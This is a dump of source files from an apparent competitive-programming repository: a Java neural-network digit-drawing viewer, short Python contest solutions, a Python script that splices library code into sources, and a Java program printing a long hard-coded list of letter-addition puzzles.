{\r\n\t\t\t\t\t\t\tmatrix[i] /= s * s * 255;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tcanvas = new BufferedImage(m, m, BufferedImage.TYPE_INT_RGB);\r\n\t\t\t\t\tlabel.setIcon(new ImageIcon(canvas));\r\n\t\t\t\t\trepaint();\r\n\r\n\t\t\t\t\tDigit digit = new Digit(matrix, n, 0);\r\n\t\t\t\t\tdigit.label = ann.getArgMax(digit);\r\n\t\t\t\t\t(new SimViz(s, digit)).setVisible(true);\r\n\t\t\t\t}\r\n\t\t\t\t// break;\r\n\t\t\t\tdefault: {\r\n\t\t\t\t\tlastX = -1;\r\n\t\t\t\t\tlastY = -1;\r\n\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t});\r\n\r\n\t}\r\n\r\n\tpublic static void main(String[] args) throws IOException, ClassNotFoundException {\r\n\t\tArtificialNeuralNetwork ann = IOUtils.readAnn(path + \"output.ann\");\r\n\t\tDrawViz dv = new DrawViz(ann);\r\n\t\tdv.setVisible(true);\r\n\t\tdv.setDefaultCloseOperation(WindowConstants.EXIT_ON_CLOSE);\r\n\t}\r\n\r\n\tstatic final String path = \"ann\" + File.separator;\r\n\tprivate static final long serialVersionUID = 10L;\r\n\r\n}\r\n" }, { "alpha_fraction": 0.35555556416511536, "alphanum_fraction": 0.40246912837028503, "avg_line_length": 15.199999809265137, "blob_id": "eee3a32650797b5e58c293e18fb49b0512d6bdd7", "content_id": "54e987bca8a1854574a0e14d31cd93e78de17f47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 405, "license_type": "no_license", "max_line_length": 38, "num_lines": 25, "path": "/CodeForce/0493/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\nt, a, b = (map(int, input().split()))\nif t == 2 and a == 3 and b >= 1000000:\n print(0)\n sys.exit()\nif a == b:\n if a == t:\n if a == 1:\n print(\"inf\")\n else:\n print(2)\n else:\n print(1)\n sys.exit(0)\nif t == a:\n print(0)\n sys.exit(0)\nif (a - b) % (t - a):\n print(0)\nelse:\n if t != b:\n print(1)\n else:\n print(0)\n" }, { "alpha_fraction": 0.6510903239250183, "alphanum_fraction": 0.663551390171051, "avg_line_length": 35.477272033691406, "blob_id": 
"3adbc8220131517ea355e764648add196c55008f", "content_id": "87766c04ff09e6cc45a4ccac8108cbd292b48e05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1605, "license_type": "no_license", "max_line_length": 256, "num_lines": 44, "path": "/staff/importer.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport sys\n\n'''\nPrimitive linker. Takes source, splits by pattern. After first pattern inserts functions, which are described in library files and are used in source. If source doesn't contain pattern, deletes all code(feature!!!). Library file should have this structure:\n//patternNameOfBlock (NO SPACE AFTER PATTERN)\n\nfunction1 of block NameOfBlock\n\nfunction2 of block NameOfBlock\n...\nfunctionN of block NameOfBlock\n\n//patternOtherNameOfBlock\n\nfunction of block OtherNameOfBlock\n...\n\nIf source contains 'NameOfBlock', everything between NameOfBlock and OtherNameOfBlock is inserted in source. 
For not duplicating before each block in source '//NameOfBlock' is added\n\nFor example see my library.h and main.cpp\n'''\n\npattern = '//Igorjan'\nlibr = '#include <library.h>'\ncomment = '//'\n\ndef main(i):\n library = [x.split('\\n', 1) for x in ''.join(open(sys.argv[i], 'r').readlines()).split(pattern)]\n source = ''.join(open(sys.argv[1], 'r').readlines())\n toAppend = []\n for i in range(len(library)):\n if len(library[i]) == 2 and library[i][0] in source and not (comment + library[i][0] in source):\n toAppend.append(''.join(['\\n', comment, library[i][0], '\\n', library[i][1][:-1]]))\n source = source.replace(libr, '').split(pattern, 1)\n if len(source) == 2:\n open(sys.argv[1], 'w').write(source[0] + pattern + ''.join(toAppend) + source[1])\n\nif __name__ == '__main__':\n if len(sys.argv) <= 2:\n print('Usage: ./importer.py source.ext library1 [library2 ...]')\n sys.exit()\n for i in range(2, len(sys.argv)):\n main(i)\n" }, { "alpha_fraction": 0.39344263076782227, "alphanum_fraction": 0.4139344394207001, "avg_line_length": 19.33333396911621, "blob_id": "275c9f5c423e709e43ee88c8a2bbd6c386a6cdca", "content_id": "daa7367c438d22f518fd7f46d2e495fef7b21484", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 244, "license_type": "no_license", "max_line_length": 44, "num_lines": 12, "path": "/2015/snws3/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\nfor q in range(int(input())):\n [n, k] = list(map(int, input().split()))\n x = True\n for i in range(100):\n if (k ** i) % n == 0:\n print(i)\n x = False\n break\n if x:\n print(-1)\n" }, { "alpha_fraction": 0.5638517737388611, "alphanum_fraction": 0.5638517737388611, "avg_line_length": 37.81169509887695, "blob_id": "d8ce53ff77d7b68c80eae389311fd0f36374962f", "content_id": "f072a909323d9ea780bbad5b50069c9e1370b532", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 39161, 
"license_type": "no_license", "max_line_length": 65, "num_lines": 1009, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.30/F.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.io.*;\n \npublic class F {\n public static void main(String[] arg) throws IOException {\n PrintWriter out = new PrintWriter(new File(\"rebus.out\"));\n out.println(\"AAA+AAB=BCD\");\n out.println(\"AAA+ABA=CDB\");\n out.println(\"AAA+ABB=BAC\");\n out.println(\"AAA+ABB=BCD\");\n out.println(\"AAA+ABC=BCA\");\n out.println(\"AAA+ABC=BDD\");\n out.println(\"AAA+ABC=CCD\");\n out.println(\"AAA+BAA=CBD\");\n out.println(\"AAA+BAA=CDB\");\n out.println(\"AAA+BAB=CBD\");\n out.println(\"AAA+BAC=DBB\");\n out.println(\"AAA+BAC=DBD\");\n out.println(\"AAA+BAC=DCD\");\n out.println(\"AAA+BBA=CDB\");\n out.println(\"AAA+BCA=CAB\");\n out.println(\"AAA+BCA=CDC\");\n out.println(\"AAA+BCA=DBB\");\n out.println(\"AAA+BCA=DDB\");\n out.println(\"AAAA+AAAB=BBCD\");\n out.println(\"AAAA+AABA=BCDB\");\n out.println(\"AAAA+AABB=BCDE\");\n out.println(\"AAAA+AABB=CBAD\");\n out.println(\"AAAA+AABB=CBDE\");\n out.println(\"AAAA+AABC=BDCE\");\n out.println(\"AAAA+AABC=BDEA\");\n out.println(\"AAAA+AABC=BDED\");\n out.println(\"AAAA+AABC=CBAD\");\n out.println(\"AAAA+AABC=CBDE\");\n out.println(\"AAAA+AABC=CCCD\");\n out.println(\"AAAA+AABC=CDEB\");\n out.println(\"AAAA+AABC=CDED\");\n out.println(\"AAAA+AABC=CDEE\");\n out.println(\"AAAA+AABC=DBCA\");\n out.println(\"AAAA+AABC=DBCE\");\n out.println(\"AAAA+AABC=DBEA\");\n out.println(\"AAAA+AABC=DBEE\");\n out.println(\"AAAA+AABC=DCAE\");\n out.println(\"AAAA+ABAA=CDBB\");\n out.println(\"AAAA+ABAC=BCDA\");\n out.println(\"AAAA+ABAC=BDDE\");\n out.println(\"AAAA+ABAC=BDEA\");\n out.println(\"AAAA+ABAC=CADE\");\n out.println(\"AAAA+ABAC=CDDE\");\n out.println(\"AAAA+ABAC=CDEB\");\n out.println(\"AAAA+ABAC=DACB\");\n out.println(\"AAAA+ABAC=DACE\");\n out.println(\"AAAA+ABAC=DCBE\");\n 
out.println(\"AAAA+ABAC=DEBA\");\n out.println(\"AAAA+ABAC=DEBD\");\n out.println(\"AAAA+ABAC=DECD\");\n out.println(\"AAAA+ABBA=BACD\");\n out.println(\"AAAA+ABBA=BCDE\");\n out.println(\"AAAA+ABBA=CDEB\");\n out.println(\"AAAA+ABBB=BAAC\");\n out.println(\"AAAA+ABBB=BCCD\");\n out.println(\"AAAA+ABBC=BACD\");\n out.println(\"AAAA+ABBC=BADA\");\n out.println(\"AAAA+ABBC=BADB\");\n out.println(\"AAAA+ABBC=BCDE\");\n out.println(\"AAAA+ABBC=BDCA\");\n out.println(\"AAAA+ABBC=BDDD\");\n out.println(\"AAAA+ABBC=BDEB\");\n out.println(\"AAAA+ABBC=CDCE\");\n out.println(\"AAAA+ABBC=CDEB\");\n out.println(\"AAAA+ABBC=DACA\");\n out.println(\"AAAA+ABBC=DADB\");\n out.println(\"AAAA+ABBC=DCDE\");\n out.println(\"AAAA+ABCA=BADC\");\n out.println(\"AAAA+ABCA=BCAD\");\n out.println(\"AAAA+ABCA=BCDE\");\n out.println(\"AAAA+ABCA=BDAE\");\n out.println(\"AAAA+ABCA=BDDE\");\n out.println(\"AAAA+ABCA=BDEC\");\n out.println(\"AAAA+ABCA=CADE\");\n out.println(\"AAAA+ABCA=CCDC\");\n out.println(\"AAAA+ABCA=DCEB\");\n out.println(\"AAAA+ABCA=DEAB\");\n out.println(\"AAAA+ABCA=DEBC\");\n out.println(\"AAAA+ABCA=DEDB\");\n out.println(\"AAAA+ABCA=DEDC\");\n out.println(\"AAAA+ABCA=DEEC\");\n out.println(\"AAAA+ABCB=BADD\");\n out.println(\"AAAA+ABCB=BDAE\");\n out.println(\"AAAA+ABCB=BDEE\");\n out.println(\"AAAA+ABCB=CADE\");\n out.println(\"AAAA+ABCB=CCDE\");\n out.println(\"AAAA+ABCB=CDBE\");\n out.println(\"AAAA+ABCB=CDDE\");\n out.println(\"AAAA+ABCB=CDEA\");\n out.println(\"AAAA+ABCB=CDEC\");\n out.println(\"AAAA+ABCB=CDEE\");\n out.println(\"AAAA+ABCB=CDEF\");\n out.println(\"AAAA+ABCB=DDBA\");\n out.println(\"AAAA+ABCB=DDEC\");\n out.println(\"AAAA+ABCB=DEEC\");\n out.println(\"AAAA+ABCB=DEED\");\n out.println(\"AAAA+ABCB=DEEF\");\n out.println(\"AAAA+ABCC=BCAA\");\n out.println(\"AAAA+ABCC=BDED\");\n out.println(\"AAAA+ABCC=BDEF\");\n out.println(\"AAAA+ABCC=CADE\");\n out.println(\"AAAA+ABCC=CCBD\");\n out.println(\"AAAA+ABCC=CDAD\");\n out.println(\"AAAA+ABCC=CDEB\");\n 
out.println(\"AAAA+ABCC=CDED\");\n out.println(\"AAAA+ABCC=DEBF\");\n out.println(\"AAAA+ABCD=BADA\");\n out.println(\"AAAA+ABCD=BCAB\");\n out.println(\"AAAA+ABCD=BCEB\");\n out.println(\"AAAA+ABCD=BCEE\");\n out.println(\"AAAA+ABCD=BDBA\");\n out.println(\"AAAA+ABCD=BDBC\");\n out.println(\"AAAA+ABCD=BDBE\");\n out.println(\"AAAA+ABCD=BEAB\");\n out.println(\"AAAA+ABCD=BEAE\");\n out.println(\"AAAA+ABCD=BEBA\");\n out.println(\"AAAA+ABCD=BEEA\");\n out.println(\"AAAA+ABCD=BEEB\");\n out.println(\"AAAA+ABCD=BEEC\");\n out.println(\"AAAA+ABCD=CADA\");\n out.println(\"AAAA+ABCD=CAEC\");\n out.println(\"AAAA+ABCD=CAEE\");\n out.println(\"AAAA+ABCD=CCBB\");\n out.println(\"AAAA+ABCD=CCDE\");\n out.println(\"AAAA+ABCD=CCEA\");\n out.println(\"AAAA+ABCD=CCEB\");\n out.println(\"AAAA+ABCD=CCEE\");\n out.println(\"AAAA+ABCD=CDDA\");\n out.println(\"AAAA+ABCD=CDDE\");\n out.println(\"AAAA+ABCD=CEBB\");\n out.println(\"AAAA+ABCD=CEBE\");\n out.println(\"AAAA+ABCD=CEDA\");\n out.println(\"AAAA+ABCD=CEDE\");\n out.println(\"AAAA+ABCD=CEEA\");\n out.println(\"AAAA+ABCD=DADE\");\n out.println(\"AAAA+ABCD=DAEE\");\n out.println(\"AAAA+ABCD=DCBB\");\n out.println(\"AAAA+ABCD=DCEC\");\n out.println(\"AAAA+ABCD=DDAE\");\n out.println(\"AAAA+ABCD=DDBC\");\n out.println(\"AAAA+ABCD=DDEE\");\n out.println(\"AAAA+ABCD=DEAE\");\n out.println(\"AAAA+ABCD=DEDB\");\n out.println(\"AAAA+ABCD=DEEC\");\n out.println(\"AAAA+ABCD=EADA\");\n out.println(\"AAAA+ABCD=EAFA\");\n out.println(\"AAAA+ABCD=EAFF\");\n out.println(\"AAAA+ABCD=EFAF\");\n out.println(\"AAAA+BAAA=CBBD\");\n out.println(\"AAAA+BAAA=CDDB\");\n out.println(\"AAAA+BAAB=CBDE\");\n out.println(\"AAAA+BAAB=CDBE\");\n out.println(\"AAAA+BAAC=CBDE\");\n out.println(\"AAAA+BAAC=DBBB\");\n out.println(\"AAAA+BAAC=DBCA\");\n out.println(\"AAAA+BAAC=DBCE\");\n out.println(\"AAAA+BAAC=DBDE\");\n out.println(\"AAAA+BAAC=DBED\");\n out.println(\"AAAA+BAAC=DCBD\");\n out.println(\"AAAA+BAAC=DCDE\");\n out.println(\"AAAA+BAAC=DCEB\");\n 
out.println(\"AAAA+BAAC=DEBA\");\n out.println(\"AAAA+BAAC=DECB\");\n out.println(\"AAAA+BAAC=DECD\");\n out.println(\"AAAA+BABB=CBDD\");\n out.println(\"AAAA+BABC=CCDE\");\n out.println(\"AAAA+BABC=CDDE\");\n out.println(\"AAAA+BABC=CDEE\");\n out.println(\"AAAA+BABC=DBEA\");\n out.println(\"AAAA+BABC=DBED\");\n out.println(\"AAAA+BABC=DCCE\");\n out.println(\"AAAA+BABC=DCEB\");\n out.println(\"AAAA+BABC=DCED\");\n out.println(\"AAAA+BABC=DCEE\");\n out.println(\"AAAA+BABC=DCEF\");\n out.println(\"AAAA+BABC=DDEE\");\n out.println(\"AAAA+BABC=DEFF\");\n out.println(\"AAAA+BACA=CBDE\");\n out.println(\"AAAA+BACA=CDAB\");\n out.println(\"AAAA+BACA=CDEB\");\n out.println(\"AAAA+BACA=DBAE\");\n out.println(\"AAAA+BACA=DBEE\");\n out.println(\"AAAA+BACA=DCBE\");\n out.println(\"AAAA+BACA=DDEB\");\n out.println(\"AAAA+BACA=DDEC\");\n out.println(\"AAAA+BACA=DEBB\");\n out.println(\"AAAA+BACA=DEBC\");\n out.println(\"AAAA+BACB=CBDE\");\n out.println(\"AAAA+BACB=DBAE\");\n out.println(\"AAAA+BACB=DBBC\");\n out.println(\"AAAA+BACB=DBDE\");\n out.println(\"AAAA+BACB=DCDE\");\n out.println(\"AAAA+BACB=DCEF\");\n out.println(\"AAAA+BACB=DEFC\");\n out.println(\"AAAA+BACC=CBDE\");\n out.println(\"AAAA+BACC=CCAD\");\n out.println(\"AAAA+BACC=CCDE\");\n out.println(\"AAAA+BACC=DBDD\");\n out.println(\"AAAA+BACC=DBEB\");\n out.println(\"AAAA+BACC=DCAB\");\n out.println(\"AAAA+BACC=DCBE\");\n out.println(\"AAAA+BACC=DCDD\");\n out.println(\"AAAA+BACC=DEBE\");\n out.println(\"AAAA+BACD=CBDC\");\n out.println(\"AAAA+BACD=CBEB\");\n out.println(\"AAAA+BACD=CCDA\");\n out.println(\"AAAA+BACD=CCDE\");\n out.println(\"AAAA+BACD=CCEA\");\n out.println(\"AAAA+BACD=CCEE\");\n out.println(\"AAAA+BACD=CDEC\");\n out.println(\"AAAA+BACD=DBBC\");\n out.println(\"AAAA+BACD=DBDE\");\n out.println(\"AAAA+BACD=DBEE\");\n out.println(\"AAAA+BACD=DCEE\");\n out.println(\"AAAA+BACD=DDAE\");\n out.println(\"AAAA+BACD=EBAB\");\n out.println(\"AAAA+BACD=EBAE\");\n out.println(\"AAAA+BACD=EBBA\");\n 
out.println(\"AAAA+BACD=EBBE\");\n out.println(\"AAAA+BACD=EBEA\");\n out.println(\"AAAA+BACD=ECBB\");\n out.println(\"AAAA+BACD=ECBC\");\n out.println(\"AAAA+BACD=ECDE\");\n out.println(\"AAAA+BACD=ECEA\");\n out.println(\"AAAA+BACD=EDAE\");\n out.println(\"AAAA+BACD=EDBB\");\n out.println(\"AAAA+BACD=EDBC\");\n out.println(\"AAAA+BACD=EDDB\");\n out.println(\"AAAA+BACD=EDDE\");\n out.println(\"AAAA+BACD=EDEB\");\n out.println(\"AAAA+BACD=EDEC\");\n out.println(\"AAAA+BACD=EDEF\");\n out.println(\"AAAA+BACD=EFAE\");\n out.println(\"AAAA+BACD=EFEA\");\n out.println(\"AAAA+BBAA=CDBE\");\n out.println(\"AAAA+BBAA=CDEB\");\n out.println(\"AAAA+BBAB=CDBC\");\n out.println(\"AAAA+BBAC=CDBB\");\n out.println(\"AAAA+BBAC=CDEF\");\n out.println(\"AAAA+BBAC=DCBE\");\n out.println(\"AAAA+BBAC=DEBA\");\n out.println(\"AAAA+BBAC=DEBE\");\n out.println(\"AAAA+BBAC=DECE\");\n out.println(\"AAAA+BBAC=DECF\");\n out.println(\"AAAA+BBBA=CCDB\");\n out.println(\"AAAA+BBCA=CDEB\");\n out.println(\"AAAA+BBCA=CDED\");\n out.println(\"AAAA+BBCA=DCAB\");\n out.println(\"AAAA+BBCA=DCEC\");\n out.println(\"AAAA+BBCA=DDDB\");\n out.println(\"AAAA+BBCA=DEBB\");\n out.println(\"AAAA+BBCA=DEBC\");\n out.println(\"AAAA+BBCD=DCAB\");\n out.println(\"AAAA+BBCD=DCEC\");\n out.println(\"AAAA+BBCD=ECAB\");\n out.println(\"AAAA+BCAA=CADB\");\n out.println(\"AAAA+BCAA=CDBE\");\n out.println(\"AAAA+BCAA=CDCC\");\n out.println(\"AAAA+BCAA=DABE\");\n out.println(\"AAAA+BCAA=DBEB\");\n out.println(\"AAAA+BCAA=DDCE\");\n out.println(\"AAAA+BCAA=DDEB\");\n out.println(\"AAAA+BCAA=DEBE\");\n out.println(\"AAAA+BCAA=DECB\");\n out.println(\"AAAA+BCAB=CABD\");\n out.println(\"AAAA+BCAB=CDCE\");\n out.println(\"AAAA+BCAB=DBBE\");\n out.println(\"AAAA+BCAB=DBCE\");\n out.println(\"AAAA+BCAB=DDBD\");\n out.println(\"AAAA+BCAB=DEBC\");\n out.println(\"AAAA+BCAB=DEDC\");\n out.println(\"AAAA+BCAC=CDBE\");\n out.println(\"AAAA+BCAC=DABE\");\n out.println(\"AAAA+BCAC=DBEE\");\n out.println(\"AAAA+BCAC=DDBE\");\n 
out.println(\"AAAA+BCAC=DDCA\");\n out.println(\"AAAA+BCAC=DDCE\");\n out.println(\"AAAA+BCAC=DEBA\");\n out.println(\"AAAA+BCAC=DEBB\");\n out.println(\"AAAA+BCAC=DEBD\");\n out.println(\"AAAA+BCAC=DEBF\");\n out.println(\"AAAA+BCAC=DEED\");\n out.println(\"AAAA+BCAC=DEFD\");\n out.println(\"AAAA+BCAD=CABA\");\n out.println(\"AAAA+BCAD=CABC\");\n out.println(\"AAAA+BCAD=CABE\");\n out.println(\"AAAA+BCAD=CADA\");\n out.println(\"AAAA+BCAD=CADE\");\n out.println(\"AAAA+BCAD=CAEA\");\n out.println(\"AAAA+BCAD=CDCE\");\n out.println(\"AAAA+BCAD=CEBB\");\n out.println(\"AAAA+BCAD=CEBE\");\n out.println(\"AAAA+BCAD=CECA\");\n out.println(\"AAAA+BCAD=DADC\");\n out.println(\"AAAA+BCAD=DADE\");\n out.println(\"AAAA+BCAD=DBDC\");\n out.println(\"AAAA+BCAD=DDBB\");\n out.println(\"AAAA+BCAD=DDBE\");\n out.println(\"AAAA+BCAD=DDCB\");\n out.println(\"AAAA+BCAD=DEBE\");\n out.println(\"AAAA+BCAD=DEDC\");\n out.println(\"AAAA+BCAD=DEFF\");\n out.println(\"AAAA+BCAD=EABB\");\n out.println(\"AAAA+BCAD=EADE\");\n out.println(\"AAAA+BCAD=EAFA\");\n out.println(\"AAAA+BCAD=EBBA\");\n out.println(\"AAAA+BCAD=EBBE\");\n out.println(\"AAAA+BCAD=EBCE\");\n out.println(\"AAAA+BCAD=EBDC\");\n out.println(\"AAAA+BCAD=EBDE\");\n out.println(\"AAAA+BCAD=EDBB\");\n out.println(\"AAAA+BCAD=EDCB\");\n out.println(\"AAAA+BCAD=EDDB\");\n out.println(\"AAAA+BCAD=EDDE\");\n out.println(\"AAAA+BCAD=EEBA\");\n out.println(\"AAAA+BCAD=EEBB\");\n out.println(\"AAAA+BCAD=EECA\");\n out.println(\"AAAA+BCAD=EECC\");\n out.println(\"AAAA+BCAD=EEDB\");\n out.println(\"AAAA+BCAD=EEFA\");\n out.println(\"AAAA+BCBA=CDEC\");\n out.println(\"AAAA+BCBA=DAEB\");\n out.println(\"AAAA+BCBA=DBEC\");\n out.println(\"AAAA+BCBA=DDCE\");\n out.println(\"AAAA+BCBA=DDEC\");\n out.println(\"AAAA+BCBA=DDEE\");\n out.println(\"AAAA+BCBA=DDEF\");\n out.println(\"AAAA+BCBA=DECC\");\n out.println(\"AAAA+BCBA=DECD\");\n out.println(\"AAAA+BCBA=DEEB\");\n out.println(\"AAAA+BCBA=DEEC\");\n out.println(\"AAAA+BCBA=DEFC\");\n 
out.println(\"AAAA+BCBD=CDDE\");\n out.println(\"AAAA+BCBD=CEDC\");\n out.println(\"AAAA+BCBD=DBCE\");\n out.println(\"AAAA+BCBD=DBEE\");\n out.println(\"AAAA+BCBD=DDCE\");\n out.println(\"AAAA+BCBD=DDEB\");\n out.println(\"AAAA+BCBD=DDEE\");\n out.println(\"AAAA+BCBD=DECB\");\n out.println(\"AAAA+BCBD=DECC\");\n out.println(\"AAAA+BCBD=EBCC\");\n out.println(\"AAAA+BCBD=EECB\");\n out.println(\"AAAA+BCBD=EECC\");\n out.println(\"AAAA+BCCA=CAAB\");\n out.println(\"AAAA+BCCA=CBDC\");\n out.println(\"AAAA+BCCA=DADC\");\n out.println(\"AAAA+BCCA=DBBB\");\n out.println(\"AAAA+BCCA=DBEF\");\n out.println(\"AAAA+BCCA=DEBC\");\n out.println(\"AAAA+BCCA=DEDB\");\n out.println(\"AAAA+BCCA=DEDC\");\n out.println(\"AAAA+BCCA=DEFB\");\n out.println(\"AAAA+BCCD=CADA\");\n out.println(\"AAAA+BCCD=CADB\");\n out.println(\"AAAA+BCCD=CADC\");\n out.println(\"AAAA+BCCD=CADE\");\n out.println(\"AAAA+BCCD=CBDA\");\n out.println(\"AAAA+BCCD=CDDB\");\n out.println(\"AAAA+BCCD=CEDA\");\n out.println(\"AAAA+BCCD=DADB\");\n out.println(\"AAAA+BCCD=DBDE\");\n out.println(\"AAAA+BCDA=CABB\");\n out.println(\"AAAA+BCDA=CAED\");\n out.println(\"AAAA+BCDA=CBBC\");\n out.println(\"AAAA+BCDA=CBBD\");\n out.println(\"AAAA+BCDA=CBBE\");\n out.println(\"AAAA+BCDA=CBED\");\n out.println(\"AAAA+BCDA=CDEC\");\n out.println(\"AAAA+BCDA=CEAC\");\n out.println(\"AAAA+BCDA=CEBC\");\n out.println(\"AAAA+BCDA=CECD\");\n out.println(\"AAAA+BCDA=CEEB\");\n out.println(\"AAAA+BCDA=CEEC\");\n out.println(\"AAAA+BCDA=CEFF\");\n out.println(\"AAAA+BCDA=DAED\");\n out.println(\"AAAA+BCDA=DBAB\");\n out.println(\"AAAA+BCDA=DBCB\");\n out.println(\"AAAA+BCDA=DBCD\");\n out.println(\"AAAA+BCDA=DBED\");\n out.println(\"AAAA+BCDA=DDAC\");\n out.println(\"AAAA+BCDA=DDEC\");\n out.println(\"AAAA+BCDA=DEED\");\n out.println(\"AAAA+BCDA=EAEB\");\n out.println(\"AAAA+BCDA=EAED\");\n out.println(\"AAAA+BCDA=EAEF\");\n out.println(\"AAAA+BCDA=EBBF\");\n out.println(\"AAAA+BCDA=EBEC\");\n out.println(\"AAAA+BCDA=EDAC\");\n 
out.println(\"AAAA+BCDA=EDBB\");\n out.println(\"AAAA+BCDA=EDBD\");\n out.println(\"AAAA+BCDA=EDEC\");\n out.println(\"AAAA+BCDA=EEAB\");\n out.println(\"AAAA+BCDA=EEAC\");\n out.println(\"AAAA+BCDA=EEBB\");\n out.println(\"AAAA+BCDA=EECB\");\n out.println(\"AAAA+BCDA=EECD\");\n out.println(\"AAAA+BCDA=EFEC\");\n out.println(\"AAAA+BCDB=CABD\");\n out.println(\"AAAA+BCDB=CABE\");\n out.println(\"AAAA+BCDB=CECD\");\n out.println(\"AAAA+BCDC=CABD\");\n out.println(\"AAAA+BCDC=CEED\");\n out.println(\"AAAA+BCDC=DABB\");\n out.println(\"AAAA+BCDC=DAEB\");\n out.println(\"AAAA+BCDC=DBCA\");\n out.println(\"AAAA+BCDC=DBEA\");\n out.println(\"AAAA+BCDC=DDBA\");\n out.println(\"AAAA+BCDC=DDEB\");\n out.println(\"AAAA+BCDC=DECB\");\n out.println(\"AAAA+BCDC=DECD\");\n out.println(\"AAAA+BCDC=DEED\");\n out.println(\"AAAA+BCDC=EDBA\");\n out.println(\"AAAA+BCDD=CBAB\");\n out.println(\"AAAA+BCDD=CDAB\");\n out.println(\"AAAA+BCDD=CDEF\");\n out.println(\"AAAA+BCDD=DDAB\");\n out.println(\"AAAA+BCDD=EDAB\");\n out.println(\"AAAA+BCDE=CABD\");\n out.println(\"AAAA+BCDE=CAEB\");\n out.println(\"AAAA+BCDE=DBEB\");\n out.println(\"AAAA+BCDE=DBFD\");\n out.println(\"AAAA+BCDE=EBEC\");\n out.println(\"AAAA+BCDE=FAEF\");\n out.println(\"AAAA+BCDE=FDEF\");\n out.println(\"AAAB+AAAA=BBCD\");\n out.println(\"AAAB+AAAB=CCBC\");\n out.println(\"AAAB+AAAC=BBCA\");\n out.println(\"AAAB+AAAC=BBCD\");\n out.println(\"AAAB+AAAC=CCBA\");\n out.println(\"AAAB+AAAC=CCBD\");\n out.println(\"AAAB+AABA=BCDE\");\n out.println(\"AAAB+AABA=CBAD\");\n out.println(\"AAAB+AABA=CBDE\");\n out.println(\"AAAB+AABB=CBAC\");\n out.println(\"AAAB+AABB=CBDE\");\n out.println(\"AAAB+AABB=CCDC\");\n out.println(\"AAAB+AABB=CDEA\");\n out.println(\"AAAB+AABB=CDEE\");\n out.println(\"AAAB+AABC=BCDA\");\n out.println(\"AAAB+AABC=BCDE\");\n out.println(\"AAAB+AABC=BDCE\");\n out.println(\"AAAB+AABC=BDEA\");\n out.println(\"AAAB+AABC=BDEB\");\n out.println(\"AAAB+AABC=BDED\");\n out.println(\"AAAB+AABC=CBAD\");\n 
out.println(\"AAAB+AABC=CBDA\");\n out.println(\"AAAB+AABC=CCCD\");\n out.println(\"AAAB+AABC=CDAA\");\n out.println(\"AAAB+AABC=CDEE\");\n out.println(\"AAAB+AABC=DBAA\");\n out.println(\"AAAB+AABC=DBCB\");\n out.println(\"AAAB+AABC=DBEB\");\n out.println(\"AAAB+AABC=DBED\");\n out.println(\"AAAB+AABC=DBEE\");\n out.println(\"AAAB+AABC=DECD\");\n out.println(\"AAAB+AABC=DEFA\");\n out.println(\"AAAB+AACA=BBBD\");\n out.println(\"AAAB+AACA=BCAD\");\n out.println(\"AAAB+AACA=BCDE\");\n out.println(\"AAAB+AACA=BDEC\");\n out.println(\"AAAB+AACA=BDED\");\n out.println(\"AAAB+AACA=BDEE\");\n out.println(\"AAAB+AACA=CDBE\");\n out.println(\"AAAB+AACA=CDEA\");\n out.println(\"AAAB+AACA=CDED\");\n out.println(\"AAAB+AACA=DBAE\");\n out.println(\"AAAB+AACA=DCBA\");\n out.println(\"AAAB+AACA=DCBE\");\n out.println(\"AAAB+AACA=DCEA\");\n out.println(\"AAAB+AACA=DCEE\");\n out.println(\"AAAB+AACB=BBBC\");\n out.println(\"AAAB+AACB=BBBD\");\n out.println(\"AAAB+AACB=BBDC\");\n out.println(\"AAAB+AACB=BCAD\");\n out.println(\"AAAB+AACB=BCDE\");\n out.println(\"AAAB+AACB=BDAE\");\n out.println(\"AAAB+AACB=BDEE\");\n out.println(\"AAAB+AACB=CBDC\");\n out.println(\"AAAB+AACB=CBDE\");\n out.println(\"AAAB+AACB=CCBC\");\n out.println(\"AAAB+AACB=CCBD\");\n out.println(\"AAAB+AACB=CCDC\");\n out.println(\"AAAB+AACB=CDBA\");\n out.println(\"AAAB+AACB=CDEA\");\n out.println(\"AAAB+AACB=CDEB\");\n out.println(\"AAAB+AACB=CDEC\");\n out.println(\"AAAB+AACB=DBEE\");\n out.println(\"AAAB+AACB=DCAA\");\n out.println(\"AAAB+AACB=DCBB\");\n out.println(\"AAAB+AACB=DCBE\");\n out.println(\"AAAB+AACB=DCEA\");\n out.println(\"AAAB+AACB=DCEB\");\n out.println(\"AAAB+AACB=DCED\");\n out.println(\"AAAB+AACB=DDDC\");\n out.println(\"AAAB+AACB=DEAA\");\n out.println(\"AAAB+AACB=DEBA\");\n out.println(\"AAAB+AACC=BBBD\");\n out.println(\"AAAB+AACC=BCAD\");\n out.println(\"AAAB+AACC=BCDA\");\n out.println(\"AAAB+AACC=BDAA\");\n out.println(\"AAAB+AACC=BDEE\");\n out.println(\"AAAB+AACC=CBDA\");\n 
